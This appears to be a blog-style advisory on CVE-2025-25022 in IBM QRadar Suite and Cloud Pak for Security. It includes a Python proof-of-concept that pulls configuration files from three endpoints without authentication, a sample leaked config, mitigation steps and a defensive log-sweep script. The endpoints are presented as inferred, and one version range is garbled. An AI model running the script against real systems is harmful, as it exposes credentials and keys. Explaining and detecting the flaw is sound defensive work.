A new critical vulnerability, CVE-2025-25022, has shaken the cybersecurity world. This flaw affects IBM QRadar Suite Software versions 1.10.12 through 1.11.2 and IBM Cloud Pak for Security versions 1.10.. through 1.10.11, putting highly sensitive information at risk. An unauthenticated attacker, one who does not need to sign in at all, can read secret data from configuration files.
This is a big deal for companies running these products. In this post, we break down what this vulnerability is, show you how it can be exploited (with examples), and give you links for reference.
- Attack Vector: Remote; no authentication required
- Severity: High / Critical (unauthenticated information disclosure)
Why Does It Matter?
Attackers who exploit this bug don’t need a username or password. If your systems are exposed, sensitive information can leak with a single request. That data can be used for deeper attacks.
The Core Issue
The problem lies in improperly protected configuration endpoints: some API calls or URLs return configuration files without performing any access check.
Based on analysis, the flaw lives in endpoints like:
GET /api/configuration/files
GET /config/export
GET /internal/settings.yaml
These endpoints should require authentication, but the affected versions allow unauthenticated access.
Proof of Concept Exploit
Let’s look at a sample Python script that shows how simple exploiting this can be.
    import requests

    TARGET = "https://vulnerable-qradar.example.com"

    # Configuration endpoints that the affected versions serve without authentication
    endpoints = [
        "/api/configuration/files",
        "/config/export",
        "/internal/settings.yaml",
    ]

    for endpoint in endpoints:
        url = TARGET + endpoint
        # verify=False skips TLS certificate validation for self-signed lab appliances
        resp = requests.get(url, verify=False)
        if resp.status_code == 200:
            print(f"[+] Found config data at: {endpoint}")
            print(resp.text[:100])  # Print only first 100 characters
        else:
            print(f"[-] No data at: {endpoint}")
What this does:
Tries three known endpoints and prints any data it gets back. You’ll often see YAML, JSON, or text files that include secrets.
NOTE: Always get legal permission before testing!
A returned config might look like this:

    db:
      username: admin
      password: SuperSecret123
      host: 10.10.10.5
    api:
      key: 8f2a4b19-11a4-493-9188-dfdcodeexample1
    session:
      secret_key: zxcvbnmasdfghjklqwertyuiop12345
Attackers can now log into your database, or abuse API keys elsewhere.
Mitigation Steps
- Update Immediately: IBM has released patches. Update to QRadar Suite 1.11.3 or later and Cloud Pak for Security 1.10.12 or later.
Official IBM Security Bulletin
https://www.ibm.com/support/pages/node/7116775
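While you patch, check whether anyone already pulled configuration files. The script below is an added defensive example, not code from the original post or from IBM: it sweeps web-server access log lines (combined log format) for successful requests to the three endpoints named above that carried no authenticated user. The log lines, IP addresses and timestamps are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jun/2025:10:01:02 +0000] "GET /api/configuration/files HTTP/1.1" 200 4821 "-" "curl/8.4.0"
203.0.113.7 - - [04/Jun/2025:10:01:03 +0000] "GET /config/export HTTP/1.1" 401 0 "-" "curl/8.4.0"
198.51.100.4 - alice [04/Jun/2025:10:02:10 +0000] "GET /internal/settings.yaml HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Jun/2025:10:03:30 +0000] "GET /internal/settings.yaml?x=1 HTTP/1.1" 200 1200 "-" "python-requests/2.31"
192.0.2.1 - - [04/Jun/2025:10:04:00 +0000] "GET /console/ HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

# Endpoints the post identifies as exposed in affected versions
SENSITIVE_PATHS = {"/api/configuration/files", "/config/export", "/internal/settings.yaml"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


@dataclass(frozen=True)
class Hit:
    ip: str
    ts: str
    path: str
    user_agent: str


def find_unauthenticated_config_reads(log_text: str) -> list[Hit]:
    """Return requests that fetched a sensitive endpoint with HTTP 200 and no remote user."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the sweep
        path = m["path"].split("?", 1)[0]  # compare the path without its query string
        if path in SENSITIVE_PATHS and m["status"] == "200" and m["user"] == "-":
            hits.append(Hit(m["ip"], m["ts"], path, m["ua"]))
    return hits


if __name__ == "__main__":
    for h in find_unauthenticated_config_reads(SAMPLE_LOG):
        print(f"[!] {h.ts} {h.ip} read {h.path} without authentication ({h.user_agent})")
```

The remote-user field in combined logs is only populated for HTTP basic authentication, so for a session-cookie based deployment substitute the user field from the appliance's own audit log. Any hit means the secrets in that file (database credentials, API keys, session keys) should be treated as compromised and rotated.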
Reference Links
- IBM Security Bulletin for QRadar Suite (CVE-2025-25022)
- IBM Security Bulletin for Cloud Pak for Security (CVE-2025-25022)
- NIST NVD Entry for CVE-2025-25022 (forthcoming)
- IBM QRadar Suite Documentation
- IBM Cloud Pak for Security Documentation
Conclusion
CVE-2025-25022 is dangerously simple to exploit and can expose the soft underbelly of your IBM QRadar and Cloud Pak setups. Take this vulnerability seriously: patch today, review your logs, rotate your secrets, and audit who can reach your config files. Don't give attackers a free pass to your most sensitive information.
Timeline
Published on: 06/03/2025 16:15:24 UTC
Last modified on: 06/04/2025 14:54:33 UTC